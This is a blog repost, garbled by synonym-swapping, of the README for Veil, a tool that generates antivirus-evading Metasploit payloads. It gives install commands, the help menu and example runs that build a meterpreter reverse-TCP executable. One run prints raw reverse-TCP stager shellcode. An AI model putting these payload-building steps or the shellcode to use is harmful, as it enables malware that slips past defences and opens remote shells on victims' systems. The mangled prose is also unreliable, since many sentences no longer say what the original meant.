Home Unlabelled Veil - Tool To Generate Metasploit Payloads That Bypass Mutual Anti-Virus Solutions

Veil - Tool To Generate Metasploit Payloads That Bypass Mutual Anti-Virus Solutions

By
Tuesday, September 24, 2019
Read
Add Comment

Veil is a tool designed to generate metasploit payloads that bypass mutual anti-virus solutions.
Veil is electrical flow nether back upwards past times @ChrisTruncer

Software Requirements:
The next OSs are officially supported:
  • Debian 8+
  • Kali Linux Rolling 2018.1+
The next OSs are probable able to run Veil:
  • Arch Linux
  • BlackArch Linux
  • Deepin 15+
  • Elementary
  • Fedora 22+
  • Linux Mint
  • Parrot Security
  • Ubuntu 15.10+

Setup

Kali's Quick Install
apt -y install veil /usr/share/veil/config/setup.sh --force --silent

Git's Quick Install
NOTE:
  • Installation must endure done amongst superuser privileges. If yous are non using the root concern human relationship (as default amongst Kali Linux), prepend commands amongst sudo or alter to the root user earlier beginning.
  • Your bundle manager may endure unlike to apt.
sudo apt-get -y install git git clone https://github.com/Veil-Framework/Veil.git cd Veil/ ./config/setup.sh --force --silent

./config/setup.sh // Setup Files
This file is responsible for installing all the dependences of Veil. This includes all the WINE environment, for the Windows side of things. It volition install all the necessary Linux packages together with GoLang, every bit good every bit Python, Ruby together with AutoIT for Windows. In addition, it volition also run ./config/update-config.py for your environment.
It includes 2 optional flags, --force together with --silent:
--force   If something goes wrong, this volition overwrite detecting whatsoever previous installs. Useful when at that spot is a setup bundle update. --silent   This volition perform an unattended installation of everything, every bit it volition automate all the steps, together with therefore at that spot is no interaction for the user.
This tin endure ran either past times doing: ./Veil.py --setup OR ./config/setup.sh --force.

./config/update-config.py // Regenerating Configuration file
This volition generate the output file for /etc/veil/settings.py. Most of the fourth dimension it volition non postulate to endure rebuilt merely inwards about cases yous mightiness endure prompted to create together with therefore (such every bit a major Veil update).
It is of import that yous are inwards the ./config/ directory earlier executing update-config.py. If yous are not, /etc/veil/settings.py volition endure wrong together with when yous launch Veil yous volition run across the following:
    Main Menu              0 payloads loaded
Don't panic. Run either: ./Veil.py --config OR cd ./config/; ./update-config.py.

Py2Exe
NOTE: Using Py2Exe is recommended over PyInstaller (as it has a lower detection rate).
MANUALLY Install on a Windows Computer (as this isn't done past times Veil's setup):

Example Usage
Veil's Main Menu:
$ ./Veil.py ===============================================================================                              Veil | [Version]: 3.1.6 ===============================================================================       [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ===============================================================================  Main Menu    2 tools loaded  Available Tools:    1)  Evasion   2)  Ordnance  Available Commands:    larn out      Completely larn out Veil   information      Information on a specific tool   listing      List available tools   options     Show Veil configuration   update      Update Veil   role     Use a specific tool  Veil>:
Help
$ ./Veil.py --help usage: Veil.py [--list-tools] [-t TOOL] [--update] [--setup] [--config]                [--version] [--ip IP] [--port PORT] [--list-payloads]                [-p [PAYLOAD]] [-o OUTPUT-NAME]                [-c [OPTION=value [OPTION=value ...]]]                [--msfoptions [OPTION=value [OPTION=value ...]]] [--msfvenom ]                [--compiler pyinstaller] [--clean] [--ordnance-payload PAYLOAD]                [--list-encoders] [-e ENCODER] [-b \x00\x0a..] [--print-stats]  Veil is a framework containing multiple tools.  [*] Veil Options:   --list-tools          List Veil's tools   -t TOOL, --tool TOOL  Specify Veil tool to role (Evasion, Ordnance etc.)   --update              Update the Veil framework   --setup               Run the Veil framework setup file & regenerate the                         configuration   --config              Regenerate the Veil framework configuration file   --version             Displays version together with quits  [*] Callback Settings:   --ip IP, --domain IP  IP address to connect dorsum to   --port PORT           Port publish to connect to  [*] Payload Settings:   --list-payloads       Lists all available payloads for that tool  [*] Veil-Evasion Options:   -p [PAYLOAD]          Payload to generate   -o OUTPUT-NAME        Output file base of operations advert for source together with compiled binaries   -c [OPTION=value [OPTION=value ...]]                         Custom payload module options   --msfoptions [OPTION=value [OPTION=value ...]]                         Options for the specified metasploit payload   --msfvenom []         Metasploit shellcode to generate (e.g.                         windows/meterpreter/reverse_tcp etc.)   --compiler pyinstaller                         Compiler choice for payload (currently entirely needed for                         Python)   --clean               Clean out payload folders  [*] Veil-Ordnance Shellcode Options:   --ordnance-payload PAYLOAD                         Payload type (bind_tcp, rev_tcp, etc.)  [*] Veil-Ordnance Encoder Options:   --list-encoders       Lists all available encoders   -e ENCODER, --encoder ENCODER                         Name of shellcode encoder to role   -b \x00\x0a.., --bad-chars \x00\x0a..                         Bad characters to avoid   --print-stats         Print information most the encoded shellcode $
Veil Evasion CLI
$ ./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py --ip 127.0.0.1 --port 4444 ===============================================================================                                    Veil-Evasion ===============================================================================       [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ===============================================================================  runtime/internal/sys runtime/internal/atomic runtime errors internal/race sync/atomic math sync io unicode/utf8 internal/syscall/windows/sysdll unicode/utf16 syscall strconv reverberate encoding/binary command-line-arguments ===============================================================================                                    Veil-Evasion ===============================================================================       [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ===============================================================================   [*] Language: larn  [*] Payload Module: go/meterpreter/rev_tcp  [*] Executable written to: /var/lib/veil/output/compiled/payload.exe  [*] Source code written to: /var/lib/veil/output/source/payload.go  [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/payload.rc $ $ file /var/lib/veil/output/compiled/payload.exe /var/lib/veil/output/compiled/payload.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows $
Veil Ordnance CLI
$ ./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 127.0.0.1 --port 4444 ===============================================================================                                    Veil-Ordnance ===============================================================================       [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ===============================================================================   [*] Payload Name: Reverse TCP Stager (Stage 1)  [*] IP Address: 127.0.0.1  [*] Port: 4444  [*] Shellcode Size: 287  \xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x09\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3 $

Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us